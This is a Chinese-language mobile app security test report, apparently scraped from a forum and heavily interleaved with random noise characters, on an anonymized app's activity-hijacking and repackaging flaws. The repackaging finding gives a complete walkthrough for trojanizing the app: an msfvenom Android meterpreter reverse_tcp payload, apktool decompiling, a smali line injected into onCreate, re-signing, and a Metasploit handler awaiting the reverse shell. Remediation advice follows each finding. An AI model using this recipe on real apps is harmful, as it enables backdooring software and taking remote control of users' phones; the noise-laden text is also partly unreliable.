. X& {2 g' V# Y% \6 Z8 R' ?
5 v2 L% D7 m4 e7 o3 c# q
1 B- o4 |. M* ?! U0 a
) p3 R$ h L! ?7 f% Z
6 C2 U: Z" s" d3 {) c* C8 j
) y" m6 Y% @/ U % w n7 \& _2 t7 k
* R$ J& T, _: A
1 s6 b5 Y1 o5 n% f7 D
6 {3 P0 B) h1 `3 o; ~! C4 B
1 _- W2 G' v4 A/ x) s
( L- m7 r0 c4 y
% f& v, N9 y' t x& X7 g# y
n3 z& q, X9 V; a& q 表1-2 测试结果
# r) V U4 T/ a; f- ^* k: V+ ?, }) P# N' _7 g0 c; r$ s# O5 M( D9 {: N
4 c3 S8 r3 M# Q+ `+ E! f) C5 C% j& p2 l, X8 C( ?
8 P) ~0 J' N; l% C T2 L h; G+ ^6 k$ }
3 Y N8 _% Y; D$ U2 ~- ^; k
9 y& {) ^+ J! k8 Y, G8 R8 [' u
- D5 K/ ^5 r; G% G+ C8 D8 Y; k5 t4 o0 e8 `1 k
( d* j4 M% f) |
* A' r6 \( z6 g' C
2 检测结果 3 ?6 Z; w) }/ h& }/ G# `2 a! [: M2 F
" ?! Q N# I* m& n. R
7 d6 w" e6 h; M1 g1 ?* c* z! ]2 ~( t7 p
2 z, |9 _% c/ s; B+ X1 P
% v0 `" H; N/ Y2 P7 n. z 2.1 某某某
+ N$ O! l4 D5 {6 C) d4 }; |) ^6 c+ A
3 u5 e( B* h c+ ]2 ?" O8 A: ], g
) \" ?. v, b$ x) D
/ L0 f; {$ I9 B; q' h0 r# F4 f: k 2.1.1检测目标
) w7 o* {& o1 ]1 D4 q
" x0 M0 N" M8 m2 C. o
/ y) W" R z, q4 L& E) N/ y% }
2 o( _+ L, T" { ; r1 j2 y% |( R, h8 B9 N
H) N5 H* g% T6 T+ |$ c5 {/ x9 M 目标地址: 某某某某某某APP 6 z- B: U( p! } v$ ]
( ~7 Z: ]" T" ]! H
. u. l2 k9 ~/ s( c$ l
X. L) f3 E( ~/ _2 L / v9 [, E6 L& A, l1 u# F# L3 z
! p$ k6 G0 |! q9 R- C/ h* d
2.1.2检测结果
3 N0 e) J* [4 k1 d
0 a H! u! p! B( D. y/ Y$ q: E
. e9 O- b, K/ B) R) \
r) `4 J. D0 e$ R, V
" v! ^5 }9 R+ L( v. e1 Y
" T3 k4 Z/ `8 j5 ^
2.1.2.1
" ~9 |; @: @- `: S8 ]' t9 W" v/ M7 W
* K2 j* d# C/ T
' D& z3 L, K' @- G" R' D! [/ T7 p) F# J5 a: Y/ `6 [! {4 r9 n) R: ~
0 q: l. _5 Q0 N5 i6 |. W2 q! T: H( S( ~
漏洞链接地址:某某某某某某APP 8 b( e0 k: k( x& r {9 \
: y8 D! B" r- G* {8 C$ z
: R0 |+ y% n9 b2 j
S: K4 }: d0 b% ~+ u( @
( d. h. ]. q! _
' i. e% R& P2 l* r* u6 M * z9 b l- L0 @ L/ h( f+ }" G% ^
3 c/ J7 j( J6 q1 j# A: a% E( v: x
+ ~* l* j2 M' f# J d" x& Z9 E8 F( Z! j* p- M# r5 C6 o
1 P) ]; N p. E# x' [9 n8 r1 m
) C& b0 {: O" G- K4 E
漏洞分析及取证: ( J( G9 @, q3 c$ ?3 v
2 q; O3 [2 y( r7 b2 I. o
+ b* }6 S& Z6 {- R2 m! }* _0 u0 d+ y, e( `8 F7 g9 q
! ~% B3 l$ C4 a5 k8 ~; I
! o6 Z% E1 M' G4 b% R, M8 X8 s 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
+ j1 k, N) ^7 h3 {3 L' q/ e3 y- ~+ v0 v* W# }% k* _
- l: f, Z& ~0 ]! p/ K. ~
" o* {3 N) w# A i" ]* I$ V . y# v) O* R' v' T1 D: A3 S! V
/ }. ~$ f; x, z% L0 k; I
4 l1 G) _! R8 G7 `, l& f8 y0 Z* J8 w3 L' x
0 A8 D. f+ e1 C. _8 `* X
+ x6 V1 D$ o1 O
8 u# @! U$ O# T3 o0 Y
0 `0 p" ^ N( p. v; I% X4 y
8 W7 P3 `, i4 G: l+ q" |' \: L" k! k7 |% v& O% _/ \! N' h* G6 f
: R2 k% R! E2 C8 Q8 e8 P* ?$ I
. J4 R* G3 C: J9 O
4 w6 }, G# `- N! Y
+ X! n! A9 G# n v& G+ F
3 @3 T" ~$ i' Z# v. u! `& A8 K% K; ?# C c t
6 K2 D. m/ j/ r3 M* j" O& K1 H- N% y( r: T
9 R5 Q7 h) o9 p# H. z1 J
! D: S" l: I7 X1 e$ A/ s4 P, n
# T7 ?' {7 C ?! S6 T, t
* T1 j0 g. P/ ]+ ~2 A+ B
& e4 N% E* S: W9 L$ @9 x$ c. J
$ u9 n3 [+ |( t4 ~ # Y! w% Z! Q3 ^; |# f
0 h7 j$ k9 P1 t1 f0 [ , O' D k+ Q7 m, F( R0 y
E" Z* J: l/ _- T" Z% p3 ?
" c: f8 H. s: M7 o& Y
& c9 u) k" D. c6 | l
6 c4 |( t, l5 B7 [" u
5 i8 K1 q- A' O& B
漏洞危害:高 + W+ _) l3 r) d& ^: b# M( }6 X- m
7 f' T: j7 t& {+ V- \: C* h; z
% v6 k! h5 b$ f6 d' ~
, L3 x6 H6 `1 D4 ?7 _
; X0 g% b7 A4 X' k) B( q |
) S z0 U1 N* m
2 ]1 g( {- v, b* U D
: w: y$ I: ~# {) I/ m) i" D" g( _ 2 U) O9 `$ w1 ]& _! r- M* _
( l1 o7 O8 A5 `+ v: n% F
& ^: K4 V7 V- t5 I7 i
% ^! b4 S( w2 Q( ] k% j
5 W: N( o8 t* ~0 x
1 c4 l. I* |+ `! d ( T& G: q) s1 R0 I* F
2 d( G7 D5 e/ I' V7 @8 e4 i
严重程度 / q- v6 H( |( U% C6 o$ ^
7 |4 \% m5 Z5 P @: F
% J' _, c2 y: [7 Y7 t9 C
- _. r; D; B' t, l' Y0 |+ r |
0 d9 [$ }) u$ _: L [9 k' o1 S+ G X! V' v' Y( R
5 g2 X& x4 @! W, ~/ k1 A# p
. V7 e7 o( `4 ^3 ^( K
4 V: y7 b) G0 G Q, z
% B. Q r; G' P( |/ X: N7 z3 ]1 w 高 : r7 v8 i9 r b& X! D" D
7 Z: y4 ]2 Q5 x: a9 V( C! k9 @
( G4 m2 A" U; n3 ^9 C9 h5 U1 j/ q" d
|
0 M# g$ ^4 e9 X1 h- [
! m! g" _8 k9 p2 d( o4 @
6 a l0 S5 D) ?9 T* p }
! `) \" |! _1 D) p 4 ^( h9 e% ^) i) G i
8 a' c( S/ m N3 A2 J ■
$ I5 {! V" O/ Y0 n' K5 g# N1 Q0 K+ k! j& J
) U: v9 J( k0 A1 O4 x: N+ a; B4 U# b, j+ t$ C3 p" ^4 ?
|
) y. [1 v7 @8 g2 |2 f5 H3 Y) E7 F8 w9 V1 W: R( u- f3 U& `
% y5 Z0 P: {: B) A8 }, \
f# E" }: N3 j7 E 5 U4 @+ \6 M) i6 f/ i
# y: p' w5 @# s, [, x5 s0 [ | 中
/ s/ Q7 h. x* W( t Q, o
5 g, V7 x1 b; Q+ o: B
% p5 O# B" A+ k+ b7 S$ ?. W, E& X
$ E {* \: i" F | ) r9 |# R5 t) ?% }* L m( g
. e- O8 D7 q" e" ?" I
7 w& i% }6 ~6 k$ q7 |) w- X0 U( ?# Y |6 N6 ~6 S9 d* R
" }9 D4 _8 s+ Z- c$ j
, U& M$ @7 } I% v! u/ S) F3 M
, f6 h; Q4 e5 h, E) Y) Y- s$ K# e5 @" k, Z
7 f+ i7 f/ t2 Z0 c
, Z4 y Y' o2 C6 i; n/ @0 e |
6 X8 Z' A- ]( O$ }8 U; D/ |! @& Y p' \
) `3 r0 v; b# u2 S7 m F
$ b( z! B) A5 c7 m# @
5 y* N: v) F( e
) r) a6 z) O/ H8 ~2 A 低
: N) [" \" {8 p/ U0 b) T% f6 P' s% C9 { v
% y* I0 N ?- ~. z: f- {& W$ _! E9 U
8 d* U" z! z! Q5 R# F; d' D( _ | $ {2 i G' q/ n0 R
! Y# c* [$ h: c V0 ^
0 w; @7 s! W0 u* w b- {) e# q8 r1 N
, W, Y9 Y- w* J7 S s
: F0 b; A2 f3 L8 ]+ p I1 \" E" `" R+ t5 S# T
3 }/ E9 P6 I9 c2 l) h+ u- |7 X' I% l
" ?3 f8 `! L) |- m) B( j$ Q
3 C: P5 O \7 F: G |
' d) S! }& A( s8 |$ {2 d( ]0 o
2 s* l( X1 e8 K: o* x2 v1 b3 R2 N" N# ~1 R$ C, I
2 @( u5 m5 }7 j! R: j2 E. a& B# e0 ]! V7 U0 v5 ]
2 N/ K7 T8 b, x% w6 ?% {: G2 T- J: o) ^, e' v& S6 k- d& ~& h
" l6 [6 W' ^6 ~# g8 Z
! |) X# s1 K, s! {0 F! s. L
v% |/ R7 L- ]& f0 @
' h$ \, I) x: ` 1 [" o/ A: v* n6 a2 Q
% v' ~7 l3 n0 h- D; h* K+ M
, P8 n8 ]; _. F$ K
' o) l7 q5 W2 W
, c" O3 n! I6 ?% l5 r A
9 I5 R/ O. p+ Q0 t$ V 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ! h" N* N: B- J5 r9 [) j& @' J
8 I# d! d: a* _! s
# E g. q4 f3 W3 l R3 a+ N
- O$ R0 W1 r' `% ? F) Q2 k8 B) m& J$ n( P, ^
* _) ~. z3 `8 t! T1 c! y6 F/ r# y" R2 j1 }
( y7 S6 p. f" X- v8 u% O
3 ~# z2 \8 g& ~ @$ @; @% Z' J- N
& M7 n9 W7 L, c# |+ L/ R! S
Y# R# f5 G5 v+ h8 l* p2 b/ N
6 p3 y; g# s% e/ r. H$ R
; C5 h) F8 z% q# b
4 y: P, R: \" v( d0 D! y' `8 K2 S {
C2 J4 x }5 [: {: m# p4 W
E! I- }( \6 H- M( G* ? 6 I! n9 [9 L* a2 f; o3 g% P! v1 }) I
7 U3 R: V9 O [, d
2.1.2.2 : }8 D% n; J( l
* T- P# ?2 k/ _/ k: O! m) ]6 f
9 C9 r9 J. m( A+ M. @* _
* i1 e- R, M# y- \5 w" i, X% c , y" j* d7 r7 p& G7 k7 X- ~0 k
% l! F- e* q9 M" Y1 {. Y! I 漏洞链接地址:某某某某某某APP
% K5 a; k F: k$ }. p3 J5 i, q0 @0 J+ f" k9 A- }
! w, S, z) H) o- t v% X" ?
) o/ p s' Z' l& u
9 [4 ^, \9 ~1 ^+ l* }9 v2 i
: y/ q% n$ F# P1 T# F3 V0 H 漏洞分析及取证: 6 L( m7 D7 J! P! ~+ ]
7 U( u! L8 X2 I3 i; f7 w
0 ]; I y& A+ ]* f% A; i
% [2 J3 p+ l4 Y D ) C ^" Y2 |/ b) \% Q
% o# S5 r5 r- Q8 y; Q! b& U6 |
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
# Z3 C7 }, D' J' M4 c( C4 M; Z$ t% _: e! T$ N: W
, a2 C. o, W$ ]. ?, g
: o: }& ?! ^2 a/ }- @- x9 o! E4 S
! f- j' q: Q4 |
) X0 X' t% x- I& L1 D9 {+ q' J5 j! B 用Metasploit 生成木马 apk % r8 |, E# \$ @4 a+ `# H
/ J, N9 b2 S" Z! c
0 ^4 y! C, B* {- B& P4 t
+ U9 G( `3 \, ?0 z, r7 {. O7 M5 N 4 g3 Y" z' o5 R
7 Q/ z" G3 O4 e( {3 i, ~ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , Z- O |% M! C1 Z7 f# G
l1 l8 Z; t5 z/ h
5 N6 Q9 E' A# t7 I/ {" p: k
* [0 G) E! H1 t# [/ {
6 @. s2 C# X8 G) H n
6 `) r7 M: Z, W 反编译目标apk和木马apk
! U) G, M' Q8 R/ g& h/ D/ Y8 \' n
( l0 u% R/ x1 K; G# e) E" g- o
7 n/ i+ {- ~ o* u2 S
2 V; x' a/ A5 `! D
; Q3 C( v: T4 A; s$ O apktool d target.apk
+ Q( q# x9 c+ b- {
8 \' N9 F* f3 G e: b apktool d cockhorse.apk
- @; e+ k4 j: U- F k) k1 _
/ |$ w% |& ?0 n" _0 ~6 P$ Q$ B
: H0 M0 g' N( r3 K
0 D5 A) i! E+ i
; h% t1 U; X6 a9 i
: `, `1 a6 k0 A 木马 apk 注入目标 apk
; j c4 N! u* @4 Y2 {* j% i# ]' w8 {6 ^4 F1 A: Z0 a- k" [
2 |8 y2 B) h# f, I1 ~
- W2 a5 X! H1 ?3 E
7 ?$ L! i6 Y- `2 d# ?+ R' v3 w
# M$ A; K8 f( L
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
" I- j/ x) ~; Y( p
- m5 Z0 N. m+ J1 s invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 T- [" T e& _- `" B/ A8 z$ L; P# v; ?: Z1 Q* `% ]
5 {+ O0 V. N$ N
8 T; n% i) j, W; E- v& | u* O# J
, D9 ?) d+ t9 D: a# }/ n4 }/ H! d' {; ?$ f; x
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 p) p: c; @% Y1 [8 J5 H
, ]8 }( u: `/ j: ?1 o! v
1 F$ ?9 [6 D W" y0 ^ r9 G/ g
& Y6 ~3 e( z; k4 j6 v 5 }; ?) D: Z$ p, ?( r* j
% E9 `5 y0 w6 y/ c Y4 b: X
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
3 M" K- ]4 h" N, W. e- p- o% A4 t! T/ r
+ g( S$ s6 _; R% J% h$ a \; m! e
J' A0 o* Z! d, V; g* ~% ]
& j+ R1 T; K+ B( o
3 `& X3 W7 P9 }. h0 a( Q 回编译生成最终 apk $ P" O$ p9 A6 E4 r. R3 C
; y6 \$ I' b& T2 d
5 X2 e' E* f6 l+ |$ i b2 h
# F3 y8 g& V( f; D$ c
2 s m, U* F! U) u+ \" v- b# J: G& g* }' p0 A6 p
重新打包
( o. Q$ t& t2 q. e4 k- q0 J; B9 ]; o7 H/ m4 M
, ?' H; S# J" q. S1 |3 |/ D4 M# ?2 B* W; H) h) q8 V" @6 b: v/ U
2 T3 J# i! T! X' J( |# X8 s# x& i% n- k* q) q. i
apktool b -o repackage.apk target_app_floder # V$ h) p# I' a' Y8 K; y* I% A
( ~9 b: \- f. _7 r3 q/ F
. `4 _/ \" s) J4 O% u& v/ M
& b% X$ {. K& C: w( j; j
( c; K/ D1 |+ Z* z
% Y8 Q0 f/ K d* G' h% O2 M2 l
创建签名文件,有的话可忽略此步骤
$ N6 t c- v$ f' x& ?5 w! p+ f4 S8 y
5 p8 z$ F3 D7 K; @0 ]- r
# S b2 { L# k5 q; J! `, |
6 t! h0 }" I7 Q% b2 A7 J7 q; n, G6 i" Q
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 " M! O' L. x1 f9 Z
/ Z- ?/ ]3 X& z# G# H- D. h- Z
8 {/ _: f% z; K1 E7 E5 y! L$ K d) x% O( H' N) P2 n! @* r6 U- P) _
. J# m1 g) {- w0 j0 X7 A2 L/ P' p' s) s+ e
签名,以下任选其一
6 [! H$ x! ]: Q8 F
$ g% d- e- K* \6 R4 Y" ~
" s+ p4 G3 k, |+ t/ K3 ^) ~4 K* n; `( @; I1 |) i* g2 i
% l* L+ f# k2 ?* D* W
( t5 r0 N; ?2 r* ^2 [" T jarsigner 方式
9 r7 i$ a0 W1 ?/ N+ x7 l" r
, W( C7 G; V* c- S- Z/ J" H$ X
$ u+ k1 I6 ~' s* ]; O
. u5 y) X8 r% E- o
' q4 q5 H! J0 l$ H& b7 n5 ~, d" G& J5 e' k; W* U/ B$ X# y
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
' l6 C! `6 d4 O6 X5 u7 w3 y/ b4 _' N, ?/ K, D1 |7 N, t, n1 y' S2 M
2 a* N) Y& o& W
' D7 A w( C$ d% r9 G+ |3 P
" e6 B! F4 I0 O9 S4 n4 u- r) }' e7 z0 t. U0 O6 h. k
apksigner 方式 ; O& N5 w; ^8 v+ x) E8 w
* O* w1 U% U2 n8 m
( W4 [+ _; Y! S8 `
; C! ?: z6 P' N2 g0 J " A f7 Z6 G1 t( r0 J6 _
0 C# i ` C4 b. o! Y apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
X0 ?& @: H" @3 q/ n' u5 l+ v; B5 J
/ r6 ^2 i( Z% B; J3 f
- E |& }, L: I2 ^ D+ O3 I
8 d/ T$ y3 P2 b5 s: i8 |+ ^: d' W; y
如需要禁用 v2签名 添加选项--v2-signing-enabled false
* _' ~9 ~# ~! z8 n9 g( G+ w0 [& w( E: I& w% x
1 ?# u3 |8 }, n) k1 e" c+ h3 Y$ H
7 }$ t+ ^: w7 R % ?7 f7 {8 U5 x; d9 p: v
0 E- p+ Y' g+ y! Y! u 验证,以下任选其一
0 f1 z2 W% u! h( q5 x
! T4 `( \* v8 ]* D, e
+ ]( |# W) P4 L7 ]" }! `
: c' M' W. P3 n0 g9 e- q: Z
( D8 {, p# ], [% n' C
( h+ W! S" P) N$ H+ U9 B7 ]& q9 o jarsigner方式 3 I8 p! W. Q! h
) ^# Z9 d: i* }: u* R+ R3 C
) q! `% ?, k: n, U6 W0 a% d
' L; U) F7 a( J% p , _5 s- P$ I% s$ ?# D- p4 u
2 W, l, ]" T" F4 j
jarsigner -verify repackaged.apk 3 a4 [; x: b5 w* ?; {9 t
- x, j9 _% H1 R9 e; I7 M0 K
$ G) z# b, m+ H' `# F
1 K# H a8 ?7 @' l; z% b2 v$ t% S
3 W2 A5 m8 T4 y: \$ C1 T& S7 Z2 |8 Z0 w
1 L. D# s3 a" u5 P4 D/ R apksigner 方式 / ]) W K2 `7 x" y
% {1 ^0 D8 l w- f% q! h8 m2 ?9 H1 X
! P/ U- E$ x1 F% d {7 Z& V
+ Y" n8 @* l+ O, X8 o( u) X
8 ]2 J: a( r$ o9 E1 e% [2 |! J/ l8 m* ^
% E8 ]3 G4 B0 W) j apksigner verify -v --print-certs repackaged.apk * Q. h5 d3 ~7 z( H- V$ `: e$ E
5 J' S- M; ~: o7 q, N3 K
1 M: K' `# h/ X" A8 [$ ~- n2 q- H5 r: ]
- i/ V; l; \5 K7 E5 t' }$ H" F. g- f, ]* v
keytool方式 . ~$ H2 B* Z9 R3 g. q: i8 x; S! c
! {. U6 I) l( @1 n7 E' A- [. ] E
/ D- o/ V( n- F ?
0 M; M$ W. ~- L9 v1 ^
" G+ C: N! D6 y& W+ b% K6 B a
; R9 y* w0 e$ v4 a keytool -printcert -jarfile repackaged.apk . ]# C4 ~% g: C6 ~" i. I" V
; M' k' p/ F% G3 k |5 @/ m1 Z6 Z
/ l% Y3 A: f4 b- r
. p8 E6 Z6 X, p7 S( H1 h& |! X
! L! X' r6 ]2 @1 A( \& r, H+ g% p8 x
对齐 % o# w5 D/ J4 p+ K3 Z' z
0 E( [+ [+ N9 i5 s- M1 e
& f4 n% s. g6 y( T- Z x5 X" M# P1 R5 C5 B0 u" M
' w- l7 G/ R5 N# \1 p
; e" b9 e* K. _5 i8 A
字节对齐优化
' g& k2 n. \; b, G
) s# P: D. Z3 _
$ [! b: o; t9 a/ g9 g6 |- c3 i% ~5 W
' k8 R( Y& V" M4 x* ~, w
. P$ I2 o" R: G6 \# e# p( G& N9 s5 y
1 \5 y- X; Z% l) K zipalign -v 4 repackaged.apk final.apk . e, r; M& R! U9 F" [7 j6 J# R
( W/ [; T2 x u; s2 o; o+ r' b
( B# _4 m8 d" A/ X3 A9 U
& `1 `1 P* X8 D8 V' W! @1 P
; N& R1 r: _1 T7 C+ q
$ T' l8 y2 B- v, o3 X 检查是否对齐
& N- [8 N, T2 p: H& D1 {
0 w# g9 I: N% |" @
& y. o' y( w$ P1 `
$ m/ i$ f( X% {4 S: U; I 8 o8 }& z3 W4 B. h0 o" {
$ U& \" a' e* w5 o* |
zipalign -c -v 4 final.apk
1 P0 ~& E" \% S4 T0 m8 X1 A! G9 t& N: r8 @9 ?8 I- w
/ G7 d8 v( L h+ v8 I) c+ J
* T) X$ O" E0 _$ i
9 e6 P- y8 O [" N& s$ Q6 z
" _) E( Z% Z: l9 v7 a 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
, r F- k! L1 f3 O Y$ s
. W" ~& l2 r+ ^3 j
% Z7 W) O( s% w; @" A, H% X. ^& z: r% B2 t3 K5 ?( b
! t2 ]# c8 _7 @! W
! x. d9 q% G- g4 ?, G% U: M 启动Metasploit控制台,配置参数等待上线
t* y$ j) P: g7 N7 b6 V9 s1 p3 U+ c/ p
! ^( w7 r6 O* [! L6 }0 {+ }) R' R* |" r; ]5 P9 P+ E( h: \
+ L" y" v& S- G! a
1 q" x, U- r9 w$ z& l1 V 在终端依次输入如下命令 7 E y- o$ V4 M: e, Y
7 m, o% T: c) k9 b
) P( A! V6 s5 z8 @
" v E' l; s- C& ` + b" S& M3 O5 K) G- u6 j% K4 v
$ c! ]! Q: m. ~$ [( g3 i J msfconsole 5 u( q! {# C3 \; z1 l% I
, Q- f9 A$ m' _9 p0 ? {* L
" C8 h3 H3 M0 W4 l9 D3 [/ P
! J P0 d2 }' B- r. w# X7 y
( p3 q+ [1 M2 [) L* \
: h" l( L+ T! @, V. h2 n5 { x use exploit/multi/handler - Y0 H) W7 v( b# {
9 _+ z" h2 K3 q# Y# i+ q! [# j
' }$ f) R1 z* H+ V1 D5 B
7 A) y1 s0 N# a6 e: B
& q9 \: d9 O4 B: k2 N# x" B
1 M; \) T3 y# E+ _
set PAYLOAD android/meterpreter/reverse_tcp ) C% w6 w3 U+ A$ y
& l$ l- ~0 F2 U& v. `, \5 B' b1 [; G
/ N: m( ~1 M0 l+ m8 o% O& [; ?% Q2 m6 W- ?! I6 }! D
* J0 N0 ^" D8 r# m
: f- V# a* ^9 s0 ]5 y& V% u, \4 a6 o7 F set LHOST 192.xxx.xx.xx
/ O+ O# H2 p$ A3 |
1 b% j. z/ f" z4 {. B: b9 I/ s
6 n+ M7 P5 K8 G4 L
+ E2 r Y3 k$ ]. |0 R2 t
- U' ^% |' l, n5 u' y, H6 o( j! l l1 u: W+ O$ {
set LPORT 4444 " I! }( c' I5 ~3 S
: b, ?* l( c. v6 v2 L
* T# l! s: J5 |/ n
1 B* d- n6 J2 l; i+ _1 j% f1 L * k* P0 ]/ ^: I) j
/ S" @, d1 O0 F \
exploit
! X1 |" A, b3 C0 ] H; R5 ]' J* u) v j2 V4 F0 X& o
# A! W) m( @% N/ W) G" q
- l( z3 W* P- Q e% C0 ~. R 1 W( ]% f% b/ o$ h9 b- E: {+ h9 v
4 \5 j* R, U& \ 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
! @' ~ W4 Z7 P* T6 x$ `& p% A2 j7 [
0 m) Y% ~ m4 \0 p q( j
# s! c( N z" V. e7 M
' o$ \( b0 `& k- p" n
0 \6 m8 P- s8 |! k8 Q 漏洞危害:中
& v! `1 y0 A4 N1 R5 j" ?5 w0 _- S
" Z0 V; u4 ~' L, q1 S" @ h0 X
* x. d' p, z1 S& A% ]4 @: s1 G: c0 M" f! Q/ Y1 h
4 f1 g; b k; b& n1 ` Q! ?: o& m. D
& S/ g& g7 j# s8 O7 v + x K0 B% r& O5 P$ L% W! R
! d2 u& r( I3 o; g , b# N, j5 Z: i, Z8 y' }
9 ^* s4 j( @* A, B8 v. E6 L& F
- E: U7 q! l6 Q n i$ C
' ]( _% {8 Z5 Q4 s
# W8 c1 Q$ Z/ y8 {$ Q" g
- u6 m* n5 Q, r3 y1 [1 ?; c 0 T, M9 d7 U* @; e( E" _
$ n& q. K% O _2 D; w F
. C5 V! m; m( t4 _$ u
& l* a0 T4 [" g: W8 y6 l
严重程度 : [5 b; R b6 Y/ c6 I! O: ]
8 W7 B" ]2 V" `; ^9 T. @0 q" C: k
* p8 k! a# P; D6 A% j/ F
2 g8 s; w. J( Y: t g# R W
| 1 L. m* ?) P- {
1 {9 a" _# T7 P* M* h
, S6 R( F# Q& r8 z9 ^4 j- X
y% `' r& L6 n0 p! [- n0 _
|/ e' c L5 j9 t& K
% l6 ]2 w, G2 ]4 d, p+ Z 高
5 r. M- ~. L" c* m8 D( F% M3 H9 {/ U `
[" ^- R3 V- R; Y6 f& [/ K. @9 _* Q
|
: ?. n3 K9 u9 c4 T3 I
1 a5 f0 s" F' b$ q 0 B2 n; A( k* y( R
6 e7 B: L) w* F. y: ?, Y i$ g1 s
0 p1 y: l" M' k8 G: W' d; e5 |+ d
9 y; \- d" J. ]6 W) Q) C0 f ■ ( A$ O F3 _+ A' A6 s4 T6 `* ^9 x5 E
" U2 {; N: e/ g3 @6 F; h! W
; t/ I; K/ z% W. m
$ d7 `* N; S- [, [% H |
6 }" U* B, C$ ? D1 H/ m& R. I; N; H0 x# d! ^4 ^
, V4 P: M6 |% h8 J5 O+ X* n
( B/ Q2 l8 @. O/ Y H# H% G; k : V. r6 [# V" J4 ~5 S4 m' o
/ I# W0 P6 C- T" v
中
, i0 {/ ]) M# P9 q
! l7 i- \' N6 `5 c( L4 x3 N
: w* ~% U# S1 g, K* H1 f
. r9 I7 v3 H2 l2 r e) Y" Q | " ^" J; q0 ]- I8 A/ M/ O3 o8 a
+ |5 q7 d; S& p& q0 t
- X( H* n. b8 u- N- D U. F- I, v3 y6 I- b: o' X; N/ I4 S
% {. j J3 a1 g8 J. {( `9 t: B5 U6 s& d" o4 M5 @$ j6 |
/ [$ d* t8 h2 Q9 d* B
( j3 I6 d' R5 X j* I
! W& H) y+ P: X! ?9 ]1 N* L8 P
' h& Z$ P) A- A; J- {" n$ @ 5 s% r, t. \; ]0 X0 d. `( }+ a
( U, r5 A/ h: h/ r' _8 J
| , N; T: X, D; P4 g7 ]
, G" Y+ R: @6 q* D) L+ Q( X
" a8 D$ v5 z0 _: W5 `' r. J- P* ~) w- ?9 X
1 c A# ^. ~0 |- d) D2 R
0 t8 _2 u! I7 Y- x2 ^ s 低
% Q( Q7 a" f5 O: s0 k8 o) X( |8 q1 L8 D7 \5 p
' @6 Z/ l" c2 s
& Y+ F7 F, ~ N% z | 4 g6 n9 k3 }' ~7 C
p+ q X' Y; l
+ y9 m% C# [ s$ x+ w! h. g) r8 j% W" Q( N
3 _4 m2 t) p3 L" [! W/ v
4 K: _- U3 |) G+ k. `- W# q' U8 w
, L! x6 s' a2 T; z3 V% N% |& I- N* D9 B
# r" m& V9 x. |5 M9 @; e2 G; j& ^8 N
7 p8 b% S4 A( o% u/ V* d u
4 p4 Z y9 r8 m( y4 ~' P9 E# X, Z0 E3 Q% {8 {
| 2 Z* v- Q0 ]! `3 e( ]# D q# o& q
, M( a! [$ T% R4 G. l) T! X
/ N; N7 e* j' O- l+ T8 e# p
% a; T8 X+ _- i
$ W% Q7 P# W! v, D" H4 i3 y" F; w( |5 i- I
0 d% E+ p* c! H/ E' [1 R% E3 w: R, k, J
; f7 X4 A( Q# ~$ t8 f0 I
0 Q( L! s: u& q$ I% t
5 \( c. p' ^, {" `7 N
+ H6 ?/ N6 L* g4 l! j9 a : |0 d6 @! {6 Q3 J4 q6 l" J
. |5 _' L2 u3 y; J$ G5 e
3 ^, j9 n4 I( u8 z
2 ?7 W2 G; O1 j5 I8 i4 _' }2 ^ ~
0 c- m' s# K8 B& P) H
) K4 O7 X; Q! S! K; R 修复方法:
8 P& m% V1 c6 q1 _; }) ]) }8 U- x' D |; {! V& p* i2 j# _0 y
7 y) {8 S6 f1 V( A8 u& q3 c: E4 m! v* f
( d+ T' _# f0 F' A# G& K 0 V; _; \ h$ I% |1 Q
0 l# K3 u) F( X' K; ?' m( W3 M3 _* R
1.在 APP 启动时应做签名校验防止二次打包。
+ W: y* [, n* _% d5 C3 Z& w- `) [) W0 W. l7 Y% ]$ u! i
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ! L, P6 l9 C0 V
5 M& W7 d6 [& d* F5 J# D
: K, D9 c/ l+ w* \$ k6 h) T6 T
% Y% v, k! F" f- Q: b! N4 b- V u) @ 9 \/ N1 j/ g9 K7 Q4 K: ~# x3 a
0 a. g3 O8 Y" C+ V3 u. j, F 7 M" N8 |* F$ ]: B
; w. {" H! Z5 S0 e; i _
+ P8 O7 ]& u4 Q' ?& z
) |8 g# `& Z4 s' i T1 j( H
/ H! A9 N8 C. z9 u
+ Q7 i! H( U6 W( Z6 R+ L' h" I
# e a. Q2 u- Q, t
7 _0 S+ u# B4 T- A
/ @9 U" a- M0 e
4 z/ [/ L2 Y" I# V
2 }# B3 ~ b$ Y3 }' x& ]
! x- j* {% S. v) W
4 v: o+ I9 L3 c8 v8 d
; T9 q+ m0 g6 f) ]" ?8 y1 a1 X